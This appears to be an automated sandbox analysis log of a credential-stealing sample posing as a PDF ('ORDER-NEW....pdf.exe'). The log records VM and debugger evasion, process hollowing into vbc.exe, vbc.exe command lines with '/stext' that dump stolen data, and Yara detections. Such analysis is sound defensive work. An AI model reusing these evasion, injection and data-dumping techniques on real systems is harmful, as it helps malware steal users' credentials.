               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5892 Thread sleep count: 146 > 30
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5892 Thread sleep time: -146000s >= -30000s
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7164 Thread sleep count: 134 > 30
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 7164 Thread sleep time: -134000s >= -30000s
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Last function: Thread delayed
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,8_2_0040978A
               Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ProcessorId FROM Win32_Processor
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Process information queried: ProcessInformation
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_0041829C memset,GetSystemInfo,8_2_0041829C
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_0040938F FindFirstFileW,FindNextFileW,wcslen,wcslen,8_2_0040938F
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_00408CAC FindFirstFileW,FindNextFileW,FindClose,8_2_00408CAC
               Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,18_2_0040702D
               Source: ORDER-NEW....pdf.exe, 00000000.00000002.733095475.0000000003C71000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.699217663.0000000002C20000.00000004.00020000.sdmp Binary or memory string: virtualMachine
               Source: Amcache.hve.9.dr Binary or memory string: VMware
               Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
               Source: Amcache.hve.9.dr Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
               Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
               Source: Amcache.hve.9.dr Binary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
               Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
               Source: bhvF129.tmp.8.dr Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:D9BC7EDF-91E8-C8ED-3ED4-3B144B30C00C&ctry=US&time=20220121T000947Z&lc=en-US&pl=en-US&idtp=mid&uid=a9223225-82ba-4622-a95e-dcecd6738abd&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=222178a1e1114cf5ab744bb5c0e1dbd6&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=1351077&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=1351077&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
               Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
               Source: ORDER-NEW....pdf.exe, 00000000.00000002.733095475.0000000003C71000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.699217663.0000000002C20000.00000004.00020000.sdmp Binary or memory string: ValueTypeDecryptionFileUnblockerVirtualMachineGetVmSInstallClassKnownFolderFlagsEnumKfKnownFolder<>c__DisplayClass1_0<>cProgramRrRunPersistenceSafeNativeMethodsStartClassStartupShortcutResourcesFm.PropertiesSettingsApplicationSettingsBaseSystem.ConfigurationIWshShellFm.IWshRuntimeLibraryIWshShell2IWshShell3IWshShortcutWshShell__StaticArrayInitTypeSize=16<PrivateImplementationDetails>
               Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
               Source: Amcache.hve.9.dr Binary or memory string: VMware7,1
               Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
               Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
               Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
               Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
               Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
               Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.me
               Source: ORDER-NEW....pdf.exe, 00000000.00000002.733095475.0000000003C71000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.699217663.0000000002C20000.00000004.00020000.sdmp Binary or memory string: .cctorGetFolderPath2installFolderGetInstallFolderGetSpecialFolderfolder.ctorByteArrayToStringdataMd5HashDataSaveDatafileNameAdataAWatpathtxtAzpackageCountdicoptionsCompressNewMethodSomnisormillisecondsWobjectmethodInvokevalueBeginInvokeIAsyncResultAsyncCallbackcallbackEndInvokeresultEFList`1listbinaryReaderDecryptplainBytespassPhraseUnblockPathUnblockFilefileNameDetectVmvirtualMachineSandieget_Hostset_Hostget_MachineNameset_MachineNamehostmachineNameTryInstallexecPathinstallPathstartupFolderkeyNamevalueNameoptionsDelayTimeCmdCopyoriginalPathnewPathGetPathknownFolderdefaultUserGetDefaultPathInitializeflagsSetPathkeyMain<.cctor>b__1rn<.cctor>b__1_0senderbargsImgTDataimagesReadMResNewStringBuilderlongnumberseedSignalnameTryClaimmutexWaittimeoutMonitorSpawnlingstateReclaimMutexBeginMonitorSpawnlingprocessSpawnNewProcessBeginReclaimMutexWaitForCloseSignalBeginWaitForCloseSignalCloseSiblingsDeleteFilekernel32ShGetFhwndOwnernFolderhTokendwFlagspszPathSHGetFolderPathshell32.dllShGetrfidppszPathSHGetKnownFolderPathShell32.dllShSetSHSetKnownFolderPathGetMdlpModuleNameGetModuleHandlekernel32.dllComputeGetTimeStampDicIList`1parametersGetHostPathindexdefaultPathLocalPathStartFilefilemodeYinstalFolderInstallFolderCompareFileSizesf1f2SrkDecompressMphparamMrgRunPe1newpathbytearrayBytesexePathCssget_ResourceManagerget_Cultureset_Cultureget_clsRPget_Default_VtblGap1_4CreateShortcutPathLinkget_FullName_VtblGap1_9get_TargetPathset_TargetPath_VtblGap2_2get_WorkingDirectoryset_WorkingDirectory_VtblGap3_1iCreateMemberRefsDelegatestypeIDCreateGetStringDelegateownerTypeSetProcessWorkingSetSizeEventArgsAttachAppGetstringIDHostMachineNameCultureDefaultFullNameTargetPathWorkingDirectoryAssemblyDescriptionAttributeAssemblyConfigurationAttributeAssemblyCompanyAttributeComp
ilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyTitleAttributeComVisibleAttributeTargetFrameworkAttributeSystem.Runtime.VersioningGuidAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyTrademarkAttributeAssemblyFileVersionAttributeSuppressIldasmAttributeFlagsAttributeCompilerGeneratedAttributeGeneratedCodeAttributeSystem.CodeDom.CompilerDebuggerNonUserCodeAttributeTypeIdentifierAttributeDefaultMemberAttributeCoClassAttributeAttributeUsageAttributeAttributeTargetsSTAThreadAttributeDispIdAttributeEditorBrowsableAttributeSystem.ComponentModelEditorBrowsableStateFm.Properties.Resources.resourcesFm.Resources.clsRP.xlgCharInt32IntPtrZeroEmptyMD5CryptoServiceProviderExceptionget_ItemReadAllBytesContainsProcessIdStreamReaderBooleanAddByteDoubleInt64SByteInt16SingleUInt32UInt64UInt16ReadBytesRijndaelManagedCryptoStreamModeIEquatable`1RegistryLocalMachineExternalExceptionFunc`2System.CoreEnumerableSystem.LinqFirstOrDefaultIEnumerable`1ArgumentExceptionPointInvalidOperationExceptionLastEventResetModeParameterizedThreadStartThreadStartICollection`1get_CountCurrentUserDeflateStreamSystem.IO.CompressionCompressionModeResolveTypeHandleGetFieldsFieldInfoBindingFlagsget_CharsResolveMethodHandl
              Source: Amcache.hve.9.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
              Source: ORDER-NEW....pdf.exe, 00000000.00000002.733095475.0000000003C71000.00000004.00000001.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.699217663.0000000002C20000.00000004.00020000.sdmpBinary or memory string: VirtualMachine
              Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_0040978A memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,8_2_0040978A
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 8_2_004443B0 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_004443B0
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156Jump to behavior
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 445000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 451000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 454000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 3AB008
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 413000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 417000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 419000
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 291008
              Source: 5.0.AppLaunch.exe.400000.0.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
              Source: 5.0.AppLaunch.exe.400000.4.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
              Source: 5.0.AppLaunch.exe.400000.3.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
              Source: 5.2.AppLaunch.exe.400000.0.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
              Source: 5.0.AppLaunch.exe.400000.2.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
              Source: 5.0.AppLaunch.exe.400000.1.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6860 -s 1156
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB254.tmp
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /stext "C:\Users\user\AppData\Local\Temp\tmpB202.tmp
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.699115256.0000000001690000.00000002.00020000.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.709749986.0000000001690000.00000002.00020000.sdmp, AppLaunch.exe, 00000005.00000002.932216392.00000000057E0000.00000002.00020000.sdmp Binary or memory string: Program Manager
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.699115256.0000000001690000.00000002.00020000.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.709749986.0000000001690000.00000002.00020000.sdmp, AppLaunch.exe, 00000005.00000002.932216392.00000000057E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.699115256.0000000001690000.00000002.00020000.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.709749986.0000000001690000.00000002.00020000.sdmp, AppLaunch.exe, 00000005.00000002.932216392.00000000057E0000.00000002.00020000.sdmp Binary or memory string: Progman
              Source: ORDER-NEW....pdf.exe, 00000000.00000000.699115256.0000000001690000.00000002.00020000.sdmp, ORDER-NEW....pdf.exe, 00000000.00000000.709749986.0000000001690000.00000002.00020000.sdmp, AppLaunch.exe, 00000005.00000002.932216392.00000000057E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe Queries volume information: C:\Users\user\Desktop\ORDER-NEW....pdf.exe VolumeInformation
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\ORDER-NEW....pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_00418137 GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy, 8_2_00418137
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 8_2_004083A1 GetVersionExW, 8_2_004083A1
              Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 18_2_004073B6 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 18_2_004073B6
              Source: Amcache.hve.9.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe

              Stealing of Sensitive Information

              Source: Yara match File source: 18.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 18.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 18.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara match File source: 18.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara match File source: 18.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 18.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.AppLaunch.exe.7f31990.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.AppLaunch.exe.9480000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.AppLaunch.exe.94d834a.4.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.AppLaunch.exe.9480000.3.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.3.AppLaunch.exe.875dbda.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.AppLaunch.exe.7f31990.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 18.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.AppLaunch.exe.7e95950.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.AppLaunch.exe.9480345.5.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 18.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 18.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.AppLaunch.exe.94d834a.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 18.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 18.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.3.AppLaunch.exe.8705890.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.3.AppLaunch.exe.875dbda.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 18.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.3.AppLaunch.exe.8705bd5.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.3.AppLaunch.exe.8705890.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000005.00000002.933455184.0000000007E95000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000012.00000000.843177172.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.933041044.0000000006FAE000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000012.00000000.842827239.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, type: MEMORY
              Source: Yara match File source: 00000005.00000003.692797770.0000000008705000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000012.00000000.842483097.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000012.00000000.843631196.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: vbc.exe PID: 4296, type: MEMORYSTR
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE
